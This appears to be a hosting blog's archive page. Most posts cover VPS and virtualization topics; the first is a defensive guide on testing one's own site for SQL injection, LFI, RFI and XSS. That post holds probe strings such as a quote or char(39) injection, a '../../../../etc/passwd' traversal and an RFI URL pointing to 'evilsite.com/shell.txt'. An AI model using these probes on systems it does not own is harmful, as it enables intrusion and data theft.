Aug 10

Website Security & Securing your Server

vps 1 Comment »

Number 1, If you are using a common CMS Google it with the word exploit make sure your version is not listed

Next try any Get Vars in your scripts and put a ‘ at the end of them what I mean is you have = you add ‘ so it’s yourwebsite.com/page?=’ or any other similar thing not only page= you may also try char(39) rather then only ‘ most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ‘ but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.
If you get an error you might want to check the script.

The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.

If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)…  If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use. The following to browse into other places ../../../../ if they wanted to they’d view your passwd file via ../../../../../../etc/passwd

Well right now you’d say big Woop they got some users maybe not but still have the ability to go to any forum on
that server and upload an avatar with PHP-EXIF data in it then include it. Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all…

Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts.

Ok next were going to discuss the abilities of an RFI and how to block it…
So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so
www.yoursite.com/file.php?file=evilsite.com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.

Prevention add http:// to your mod security this way when they try remotely including a file in the URL httpd:// mod_security will block it.

Ok our next subject is XSS. What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn’t really see it… but when you clicked they could potentially grab your cookie or any current stored browser information. With this they could use your cookie as their own to login as you… maybe even get password information from this cookie.

As for SQL injection the way to block this is to… add ‘ or /* to the mod security be sure to add in char(39) as it’s ‘ in php and php will in fact read it from a URL and interpret it as ‘ and still launch the sql injection.

One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.  You can do this by obfuscating the code using Zend or similar.

Finally, never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.

Tagged with:
Jul 27

Server Load Balancing

virtualization news, vps 4 Comments »

Load balancing

Load balancing allows your website to continue performing in the event of server downtime due to server failure or planned maintenance. Managed server load balancing from delivers

  • Load balancing to improve performance through efficient distribution of network traffic
  • Firewalls in High Availability configuration
  • Web servers arranged in active-active or active-passive pairs to provide failover redundancy
  • Database servers replicated or clustered for reliability and performance
  • Improved performance for your website and applications
  • Service continuity in the event of a server failure

Load balancing is fully configurable to meet your requirements. You can specify round-robin, weighted round-robin, least connections or least sessions load balancing methods as well as stickiness based on IP address, cookie, session ID.

Tagged with:
Jul 23

Cloud Servers API from Rackspace

virtualization news, vps No Comments »

Cloud service host Rackspace is adding API access to its hosted clouds, to give cloud service suppliers more control and flexibility over their hosted servers.

Rackspace offers Cloud Server hosting to cloud service provider customers, using technology from its Slicehost subsidiary. Customers currently manage their servers through a Control Panel GUI.

The coming API, built using a RESTful web service interface, will enable customers to have better control of their server instances in the Rackspace hosting centres. They will be able to write code that programmatically detects server load and scales the number of server instances up and down, for example.

The API introduces features that the Control Panel does not have. One is the ability to specify files when a server instance is created that will be injected into the server file system before startup. Rackspace says this is useful when inserting SSH keys, setting configuration files, or storing data that customers want to retrieve from within the Cloud Server itself.

A second new feature refers to identification of the server host. The Cloud Servers provisioning algorithm attempts to spread out customer virtual machines across hosts. Under certain situations, Cloud Servers from the same customer may be placed on the same host. Host identification allows customers to detect this condition and take appropriate action.

The API also makes it simpler to create shared IP groups and enable high availability configurations. Showing that it is au fait with iPhone popularity, Rackspace customers will be able to manage their clouds with an iPhone

Jul 19

OpenVZ Virtual Server

Uncategorized No Comments »

The architecture of OpenVZ is different from the traditional virtual machines architecture because it always runs the same OS kernel as the host system (while still allowing multiple Linux distributions in individual containers). This single-kernel implementation technology enables running containers with a near-zero overhead. Thus, OpenVZ offer an order of magnitude higher efficiency and manageability than traditional virtualization technologies.

From the point of view of applications and container users, each container is an independent system. This independence is provided by a virtualization layer in the kernel of the host OS. Note that only a negligible part of the CPU resources is spent on virtualization (around 1-2%). The main features of the virtualization layer implemented in OpenVZ are the following:

  • A container looks and behaves like a regular Linux system. It has standard startup scripts; software from vendors can run inside a container without OpenVZ-specific modifications or adjustment;
  • A user can change any configuration file and install additional software;
  • Containers are completely isolated from each other (file system, processes, Inter Process Communication (IPC), sysctl variables);
  • Processes belonging to a container are scheduled for execution on all available CPUs. Consequently, CTs are not bound to only one CPU and can use all available CPU power.

A live migration and checkpointing feature was released for OpenVZ in the middle of April 2006. It allows to migrate a container from one physical server to another without a need to shutdown/restart a container. The process is known as checkpointing: a CT is frozen and its whole state is saved to the file on disk. This file can then be transferred to another machine and a CT can be unfrozen (restored) there. The delay is about a few seconds, and it is not a downtime, just a delay.

OpenVZ is free open source software, available under GNU GPL. OpenVZ is the basis of Parallels Virtuozzo Containers, a commercial virtualization solution offered by Parallels.

Jul 03

Xen Server – VDS Platform

virtualization news, vps No Comments »

A Xen system is structured with the Xen hypervisor as the lowest and most privileged layer. Above this layer are one or more guest operating systems, which the hypervisor schedules across the physical CPUs. The first guest operating system, called in Xen terminology “domain 0″ (dom0), is booted automatically when the hypervisor boots and given special management privileges and direct access to the physical hardware. The system administrator can log into dom0 in order to manage any further guest operating systems, called “domain U” (domU) in Xen terminology.

On most CPUs, Xen uses a form of virtualization known as paravirtualization, meaning that the guest operating system must be modified to use a special hypercall ABI instead of certain architectural features. Through paravirtualization, Xen can achieve high performance even on its host architecture (x86) which is notoriously uncooperative with traditional virtualization techniques.

Both Intel and AMD have contributed modifications to Xen to support their AMD-V and Intel VT architecture extensions. This has been a significant development because it allows proprietary operating systems (such as Microsoft Windows) to be virtualized since the guest system’s kernel does not require modification when the host runs on Intel VT or AMD-V hardware.

Xen virtual machines can be “live migrated” between physical hosts across a LAN without loss of availability. During this procedure, the memory of the virtual machine is iteratively copied to the destination without stopping its execution. Stoppage of around 60–300 ms is required to perform final synchronization before the virtual machine begins executing at its final destination, providing an illusion of seamless migration.

Jun 17

Your own VPS “cloud”

vps No Comments »

Everyone these days is now familiar with the hype and buzz surrounding cloud computing. If you’re not, I suggest reading the Wikipedia article! The “cloud” abstracts technology, specifically the hardware from the end-user. It is useful because it means a web developer no longer has to think about disk failures or similar when developing their application – they just need to write their application to be scalable. As long as the application is written in the correct way, a disk failure won’t cause any downtime because their application is hosted on a cloud – and the “cloud” mitigates hardware failure by detecting issues as and when they happen, and migrating live virtual servers (your VDS/VPS) over to spare hardware.

Some of the big players in the market include Amazon’s EC2, Rackspace’s Cloud Servers, Flexiscale plus many others. With the release of software like Eucalyptus, it looks like the marketplace may become even more crowded as barriers to entry fall because less original development will be required to set up your own “cloud” of servers.

Jun 12

HyperVM – Virtual Server Management

vps No Comments »

HyperVM is a popular piece of software for managing nodes running virtual servers. Unfortunately, over the last few months it has become apparent that the software appears to be incredibly flawed. Security wise, there have been numerous critical vulnerability updates release. Any provider that was slow with their server updates will have found their systems extremely vulnerable to hacking.

Culminating in the recent hack of A2B2/Vaserv/FSCK VPS, where tens of thousands of websites were taken offline on multiple servers by exploiting a serious vulnerability in the HyperVM virtual machine management software.
http://www.theregister.co.uk/2009/06/08/webhost_attack/

Whilst automation is an important detail of an efficient system – it is even more important to ensure that the integrity of that system is not compromised by implementing the automation. In this instance, a single installation of HyperVM with root access to many dozens of servers was compromised. It is important to consider worst case scenarios with any kind of service. What is the absolute worst that could happen to my system? What would be my nightmare?

Think of your nightmare… and then multiply it a few times. Then make a contingency plan.

Tagged with:
May 22

VDS Hosting

vps No Comments »

Typical Virtual Dedicated Hosting hardware would involve using a very powerful machine, such that the server when “sliced up” will still offer excellent performance. Typically, you will want to use multiple quad core CPUs with 8GB+ of RAM. However, the key piece of hardware that most people overlook when looking for a VPS or VDS host is that of disks. Hard disks are still the bottleneck in all modern computer systems, and when those disks are busy, the CPU can do little else but wait. You can have all the CPU power in the world but with slow disks, they’ll never be able to do anything useful – especially when it comes to hosting.

We would generally recommend multiple SAS (Serial Attached SCSI) disks in RAID10 configuration. The more disks you have in the RAID10 array, the best the performance overall. Fast disks make for a system that “feels” a lot faster, and will give the edge over systems using much slower SATA disks.

Tagged with:
Apr 27

Server Operating Systems

vps No Comments »

A virtual dedicated server (VDS or VPS) can run a number of operating systems. To the operating system, the “virtual machine” appears as if it were real hardware. This means that you can install any operating system compatible with the x86 virtual machine that the virtualization manager provides. So you can have any flavour of Linux (CentOS, Ubuntu, etc) or you can even install Windows – typically this would be Server 2003 Web Edition or Standard. On top of this you can then install your favourite control panel system – for instance cPanel (http://cpanel.net), Plesk, or LXadmin (if you want a free one…)

It is recommended, however that if you choose Windows as an operating system on a server, you should assign the virtual machine at least 512MB of RAM so that it can operate efficiently without the machine using hard disk swap all the time. The increase in performance over a machine with less RAM is significant.

Apr 20

What is a Virtual Dedicated Server?

vps No Comments »

A virtual dedicated server (VDS, also referred to as Virtual Private Server or VPS) is a method of partitioning a physical server computer into multiple “virtual” servers such that each has the appearance and capabilities of running on its own dedicated machine. Each virtual server can run its own full-fledged operating system, and each server can be independently controlled/rebooted/resized/migrated.

There are two kinds of virtualisation: software based and hardware based. In a software based virtual environment, the virtual machines share the same kernel and actually require the main node’s resources. This kind of virtualization normally has many benefits in a web hosting environment because of quota incrementing and decrementing in real time with no need to restart the node. The main examples are Xen, Virtuozzo, Vserver, and OpenVZ (which is the open source and development version of Parallels Virtuozzo Containers).

Tagged with:
Previous Entries Next Entries
preload preload preload